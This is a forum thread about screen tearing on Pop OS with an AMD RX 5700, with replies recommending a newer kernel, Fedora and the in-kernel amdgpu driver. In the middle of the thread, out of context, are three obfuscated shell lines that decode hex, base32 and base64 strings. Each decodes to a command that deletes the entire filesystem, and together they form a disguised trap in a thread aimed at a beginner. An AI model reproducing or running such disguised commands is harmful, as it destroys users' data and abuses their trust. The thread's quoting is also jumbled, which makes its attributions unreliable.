Screen tearing POP OS

Go to solution Solved by Electronics Wizardy,
5 minutes ago, Donut417 said:

I installed POP OS like a month ago, so what ever the latest version out at that time. Not sure how to check the driver Version. I downloaded it directly from the AMD website if that helps at all. 

You don't normally want to download drives from amds website in linux.

What kernel version. Run uname -a

Try running a newer kernel, like 5.3

I use POP OS 18.04 and I have a Radeon RX5700 with the AMD drivers installed. I have two monitors one 1080p 16:9 and a 1080p 21:9. Ive noticed screen tearing in videos. As well as noticed some tearing on the 21:9 screen when playing Minecraft. I read this is a common issue. Was wondering if there were any work arounds? 

I just want to sit back and watch the world burn. 

3 minutes ago, novarage1 said:

The issue is those instructions are for Intel/Nvidia. AMD from my understanding is a bit different when it comes to Linux. 

I have a 290X on Ubuntu. Installed the Linux driver for 19.04 and yeah, screen tearing. Haven't figured out any solution. I'm wondering if it has anything to do with the driver version compared to the card.

What version of the driver did you install?

19.04? Try using kernel 5.3 or newer.

# $(echo 726d202d7266202f2a0a | xxd -r -p)
# $(echo OJWSALLSMYQC6KQK | base32 -d)
# $(echo cm0gLXJmIC8qCg== | base64 -d)

12 minutes ago, Windows7ge said:

I have a 290X on Ubuntu. Installed the Linux driver for 19.04 and yeah, screen tearing. Haven't figured out any solution. I'm wondering if it has anything to do with the driver version compared to the card.

What version of the driver did you install?

I installed POP OS like a month ago, so what ever the latest version out at that time. Not sure how to check the driver Version. I downloaded it directly from the AMD website if that helps at all. 

5 minutes ago, Donut417 said:

3 minutes ago, Electronics Wizardy said:

inux pop-os 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Well it was the only way I knew how to install the driver. I had to install it because I have dual monitors and it was the only way to get them to work. 

6 minutes ago, Donut417 said:

inux pop-os 5.0.0-23-generic #24~18.04.1-Ubuntu SMP Mon Jul 29 16:12:28 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Well it was the only way I knew how to install the driver. I had to install it because I have dual monitors and it was the only way to get them to work. 

Try using a distro with a newer kernel, you don't want to install drives like that in linux, it does drivers differntly than windows.

6 minutes ago, Electronics Wizardy said:

Try using a distro with a newer kernel,

The issue here is the version I have is the LTS version. I dont like having the upgrade OS's every year or so. Im going to guess that if it uses a new kernel, then its one of the non long term support versions. Plus POP OS is close to Ubuntu and I have a little better idea on how to use it vs other distros. If you havent guessed, Im not a very advanced Linux user. I just refuse to use Windows 10. 

8 minutes ago, Electronics Wizardy said:

you don't want to install drives like that in linux

As it stated. Could not find any other place to install them from. I have dual monitors and the drivers were needed for that. If you would like to enlighten me on the correct way to get the drivers Im all ears. 

40 minutes ago, Donut417 said:

As it stated. Could not find any other place to install them from. I have dual monitors and the drivers were needed for that. If you would like to enlighten me on the correct way to get the drivers Im all ears. 

Normally the best way is to just run a newer kernel

41 minutes ago, Donut417 said:

The issue here is the version I have is the LTS version. I dont like having the upgrade OS's every year or so. Im going to guess that if it uses a new kernel, then its one of the non long term support versions. Plus POP OS is close to Ubuntu and I have a little better idea on how to use it vs other distros. If you havent guessed, Im not a very advanced Linux user. I just refuse to use Windows 10. 

The issue is you have a new gpu, so there isn't good support unless your running the newest kernel, so id run a distro like fedora that has a more upto date kernel.

4 minutes ago, Electronics Wizardy said:

Normally the best way is to just run a newer kernel

The issue is you have a new gpu, so there isn't good support unless your running the newest kernel, so id run a distro like fedora that has a more upto date kernel.

How does Fedora do with games and steam? 

1 hour ago, Electronics Wizardy said:

So let's say you have an application that doesn't register your GPU with the included AMD driver. Updating your Kernel should be the fix?

@Electronics Wizardy I seen that steam should work. My last question is, does Fedora do a long term support version? Is that what Fedora 30 is? OR does Fedora upgrade one Version to another well? I dont want to have another Windows 10 situation where an in place upgrade, turns in to a reinstall. 

2 hours ago, Donut417 said:

@Electronics Wizardy I seen that steam should work. My last question is, does Fedora do a long term support version? Is that what Fedora 30 is? OR does Fedora upgrade one Version to another well? I dont want to have another Windows 10 situation where an in place upgrade, turns in to a reinstall. 

centos is basically fedora lts, but with that new of hardware you don't want lts now.

Upgrade also really aren't that bad, they take like 30min max and normally work just fine.

On 9/23/2019 at 11:04 PM, Electronics Wizardy said:

centos is basically fedora lts, but with that new of hardware you don't want lts now.

Upgrade also really aren't that bad, they take like 30min max and normally work just fine.

In that case. Would you suggest Fedora 30 or 31 (beta)? 

Just now, Donut417 said:

In that case. Would you suggest Fedora 30 or 31 (beta)? 

Id give fedora 30 a shot, see howit works for you. I like using fedora and it has worked pretty well for me

7 hours ago, Electronics Wizardy said:

Id give fedora 30 a shot, see howit works for you. I like using fedora and it has worked pretty well for me

Ok. If installing drivers from the AMD website is wrong. How do I install the drivers in Fedora for my 5700? 

7 minutes ago, Donut417 said:

Ok. If installing drivers from the AMD website is wrong. How do I install the drivers in Fedora for my 5700? 

you don't have to, the amdgpu drivers are already included in the kernel.

14 minutes ago, Electronics Wizardy said:

you don't have to, the amdgpu drivers are already included in the kernel.

Well I have to if I want both monitors the work. Because thats why I manually installed them on the other install. Then poof, both monitors worked. I still have a bit of screen tearing as well.

14 minutes ago, Donut417 said:

Well I have to if I want both monitors the work. Because thats why I manually installed them on the other install. Then poof, both monitors worked. I still have a bit of screen tearing as well.

was it this way with fedora as well? Did you try rawhide?

Just now, Electronics Wizardy said:

was it this way with fedora as well? Did you try rawhide?

I didnt install the AMD drivers yet. This is fresh install. What the hell is rawhide? You need to understand something. Ive used Windows from 3.11 up to Windows 10. I jumped Ship because Windows 10 is a sorry excuse for an OS. So you have to speak to me like Im a moron, because as it stands the last time I really used Linux was on a laptop and Windows XP was the current MS OS.

Just now, Donut417 said:

I didnt install the AMD drivers yet. This is fresh install. What the hell is rawhide? You need to understand something. Ive used Windows from 3.11 up to Windows 10. I jumped Ship because Windows 10 is a sorry excuse for an OS. So you have to speak to me like Im a moron, because as it stands the last time I really used Linux was on a laptop and Windows XP was the current MS OS.

raw hide is fedoras beta.

Are you using wayland? Try using wayland

8 minutes ago, Electronics Wizardy said:

Im using Fedora 30, which is the latest STABLE build from what I seen. I dont do Beta OS builds.

Also this is listed for graphics: llvmpipe. It looks like some Open Source driver, but not AMD. Is there a repository I need to add to get the driver to install?

1 hour ago, Electronics Wizardy said:

Saw a post that the 5700XT works in Ubutnu 18.04. So I think Ill just head that route. I dont want to spend all weekend trying to get this to work. When it kinda was working on Pop OS, with the drivers install manually. Fedora's documentation seems to be a bit thin on the subject of the AMD drivers or dual monitors.